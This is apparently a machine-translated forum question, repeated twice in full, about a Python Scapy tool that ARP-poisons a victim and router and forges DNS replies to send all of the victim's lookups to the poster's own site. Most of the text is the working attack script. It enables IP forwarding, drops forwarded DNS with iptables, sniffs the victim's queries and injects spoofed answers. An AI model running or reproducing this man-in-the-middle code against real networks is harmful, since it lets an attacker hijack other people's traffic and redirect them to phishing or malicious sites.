我的 DNS 欺骗仅适用于某些站点?
my dns spoofing only works with some sites?
我在 python 中创建了一个 DNF 欺骗程序(带有 ARP 中毒)只是为了好玩。我的目标只是将受害者的 DNS 请求重定向到我的站点。因此,无论何时他们访问任何网站,他们都会访问我的网站。然而,它似乎只适用于某些网站,而不是所有网站,当他们访问 twitter 或 facebook 等网站时似乎不起作用,但是当他们访问 google 或更小的网站时,他们被重定向就好了吗?我也在我的代码中使用 iptables 规则来阻止来自路由器的所有 dns。
有人知道为什么吗?
代码:
#command line arguments
parser = argparse.ArgumentParser(description='ARP Poisoning and DNS Spoofing')
parser.add_argument('-v', '--victim', dest='victimIP', help="IP Address of victim", required=True)
parser.add_argument('-t', '--target', dest='targetIP', help="IP Address of spoof site", required=True)
parser.add_argument('-r', '--router', dest='routerIP', help="IP Address of Router", required=True)
args = parser.parse_args()
vIP = args.victimIP
targetIP = args.targetIP
routerIP = args.routerIP
localMAC = ""
victimMAC = ""
routerMAC = ""
#Setup function
def setup():
#setup forwarding rules
#disable forwarding of DNS requests to router
os.system('echo 1 > /proc/sys/net/ipv4/ip_forward')
#iptables rule
Popen(["iptables -A FORWARD -p UDP --dport 53 -j DROP"], shell=True, stdout=PIPE)
#Flush iptables on exit
def reset():
Popen(["iptables -F"], shell=True, stdout=PIPE)
#get MACaddress of local machine
def getOurMAC(interface):
try:
mac = open('/sys/class/net/'+interface+'/address').readline()
except:
mac = "00:00:00:00:00:00"
return mac[0:17]
#returns MAC address of victim IP
def getTargetMAC(IP):
#add the target to our system's ARP cache
pingResult = Popen(["ping", "-c 1", IP], stdout=PIPE)
pid = Popen(["arp", "-n", IP], stdout=PIPE)
s = pid.communicate()[0]
MAC = re.search(r"(([a-f\d]{1,2}\:){5}[a-f\d]{1,2})", s).groups()[0]
return MAC
#constructs and sends arp packets to send to router and to victim.
def ARPpoison(localMAC, victimMAC, routerMAC):
arpPacketVictim = Ether(src=localMAC, dst=victimMAC)/ARP(hwsrc=localMAC, hwdst=victimMAC, psrc=routerIP, pdst=vIP, op=2)
arpPacketRouter = Ether(src=localMAC, dst=routerMAC)/ARP(hwsrc=localMAC, hwdst=routerMAC, psrc=vIP, pdst=routerIP, op=2)
print str(vIP) + " has been poisoned."
while True:
try:
sendp(arpPacketVictim, verbose=0)
sendp(arpPacketRouter, verbose=0)
#pause between each send
time.sleep(3)
except KeyboardInterrupt:
sys.exit(0)
#construct and send a spoofed DNS response packet to the victim
def reply(packet):
global targetIP
responsePacket = (IP(dst=vIP, src=packet[IP].dst)/UDP(dport=packet[UDP].sport, sport=packet[UDP].dport)/\
DNS(id=packet[DNS].id, qd=packet[DNS].qd, aa=1, qr=1, an=DNSRR(rrname=packet[DNS].qd.qname, ttl=10, rdata=targetIP)))
send(responsePacket, verbose=0)
print "Sent spoofed DNS Packet"
return
#this parse creates a thread
def parse(packet):
if packet.haslayer(DNS) and packet.getlayer(DNS).qr==0:
replyThread = threading.Thread(target=reply, args=packet)
replyThread.start()
#initiate sniff filter for DNS requests
def DNSsniffer():
global vIP
print "Sniffing DNS"
sniffFilter = "udp and port 53 and src " +str(vIP)
sniff(filter=sniffFilter, prn=parse)
# main function
def main():
victimMAC = getTargetMAC(vIP)
localMAC = getOurMAC("eno1")#Datacomm card
routerMAC = getTargetMAC(routerIP)
#threads creation
ARPThread = threading.Thread(target=ARPpoison, args=(localMAC, victimMAC, routerMAC))
sniffThread = threading.Thread(target=DNSsniffer)
#
ARPThread.daemon = True
sniffThread.daemon = True
#
ARPThread.start()
sniffThread.start()
#Keyboard Interrupt
while True:
try:
time.sleep(5)
except KeyboardInterrupt:
reset()
print "Exiting"
sys.exit(0)
#--------------------------------------------------
setup()
main()
更新:
我做了一些进一步的测试,当受害者去 google 这样的网站时,它似乎重定向得很好。快速加载网站,但对于更大的网站,如 facebook 或 twitter,它似乎永远加载。
我可以生成进程而不是生成线程吗?
原来这只是 facebook 和 twitter 上的安全性一起阻止了欺骗,我的代码没有问题。
我在 python 中创建了一个 DNF 欺骗程序(带有 ARP 中毒)只是为了好玩。我的目标只是将受害者的 DNS 请求重定向到我的站点。因此,无论何时他们访问任何网站,他们都会访问我的网站。然而,它似乎只适用于某些网站,而不是所有网站,当他们访问 twitter 或 facebook 等网站时似乎不起作用,但是当他们访问 google 或更小的网站时,他们被重定向就好了吗?我也在我的代码中使用 iptables 规则来阻止来自路由器的所有 dns。
有人知道为什么吗?
代码:
#command line arguments
parser = argparse.ArgumentParser(description='ARP Poisoning and DNS Spoofing')
parser.add_argument('-v', '--victim', dest='victimIP', help="IP Address of victim", required=True)
parser.add_argument('-t', '--target', dest='targetIP', help="IP Address of spoof site", required=True)
parser.add_argument('-r', '--router', dest='routerIP', help="IP Address of Router", required=True)
args = parser.parse_args()
vIP = args.victimIP
targetIP = args.targetIP
routerIP = args.routerIP
localMAC = ""
victimMAC = ""
routerMAC = ""
#Setup function
def setup():
#setup forwarding rules
#disable forwarding of DNS requests to router
os.system('echo 1 > /proc/sys/net/ipv4/ip_forward')
#iptables rule
Popen(["iptables -A FORWARD -p UDP --dport 53 -j DROP"], shell=True, stdout=PIPE)
#Flush iptables on exit
def reset():
Popen(["iptables -F"], shell=True, stdout=PIPE)
#get MACaddress of local machine
def getOurMAC(interface):
try:
mac = open('/sys/class/net/'+interface+'/address').readline()
except:
mac = "00:00:00:00:00:00"
return mac[0:17]
#returns MAC address of victim IP
def getTargetMAC(IP):
#add the target to our system's ARP cache
pingResult = Popen(["ping", "-c 1", IP], stdout=PIPE)
pid = Popen(["arp", "-n", IP], stdout=PIPE)
s = pid.communicate()[0]
MAC = re.search(r"(([a-f\d]{1,2}\:){5}[a-f\d]{1,2})", s).groups()[0]
return MAC
#constructs and sends arp packets to send to router and to victim.
def ARPpoison(localMAC, victimMAC, routerMAC):
arpPacketVictim = Ether(src=localMAC, dst=victimMAC)/ARP(hwsrc=localMAC, hwdst=victimMAC, psrc=routerIP, pdst=vIP, op=2)
arpPacketRouter = Ether(src=localMAC, dst=routerMAC)/ARP(hwsrc=localMAC, hwdst=routerMAC, psrc=vIP, pdst=routerIP, op=2)
print str(vIP) + " has been poisoned."
while True:
try:
sendp(arpPacketVictim, verbose=0)
sendp(arpPacketRouter, verbose=0)
#pause between each send
time.sleep(3)
except KeyboardInterrupt:
sys.exit(0)
#construct and send a spoofed DNS response packet to the victim
def reply(packet):
global targetIP
responsePacket = (IP(dst=vIP, src=packet[IP].dst)/UDP(dport=packet[UDP].sport, sport=packet[UDP].dport)/\
DNS(id=packet[DNS].id, qd=packet[DNS].qd, aa=1, qr=1, an=DNSRR(rrname=packet[DNS].qd.qname, ttl=10, rdata=targetIP)))
send(responsePacket, verbose=0)
print "Sent spoofed DNS Packet"
return
#this parse creates a thread
def parse(packet):
if packet.haslayer(DNS) and packet.getlayer(DNS).qr==0:
replyThread = threading.Thread(target=reply, args=packet)
replyThread.start()
#initiate sniff filter for DNS requests
def DNSsniffer():
global vIP
print "Sniffing DNS"
sniffFilter = "udp and port 53 and src " +str(vIP)
sniff(filter=sniffFilter, prn=parse)
# main function
def main():
victimMAC = getTargetMAC(vIP)
localMAC = getOurMAC("eno1")#Datacomm card
routerMAC = getTargetMAC(routerIP)
#threads creation
ARPThread = threading.Thread(target=ARPpoison, args=(localMAC, victimMAC, routerMAC))
sniffThread = threading.Thread(target=DNSsniffer)
#
ARPThread.daemon = True
sniffThread.daemon = True
#
ARPThread.start()
sniffThread.start()
#Keyboard Interrupt
while True:
try:
time.sleep(5)
except KeyboardInterrupt:
reset()
print "Exiting"
sys.exit(0)
#--------------------------------------------------
setup()
main()
更新: 我做了一些进一步的测试,当受害者去 google 这样的网站时,它似乎重定向得很好。快速加载网站,但对于更大的网站,如 facebook 或 twitter,它似乎永远加载。
我可以生成进程而不是生成线程吗?
原来这只是 facebook 和 twitter 上的安全性一起阻止了欺骗,我的代码没有问题。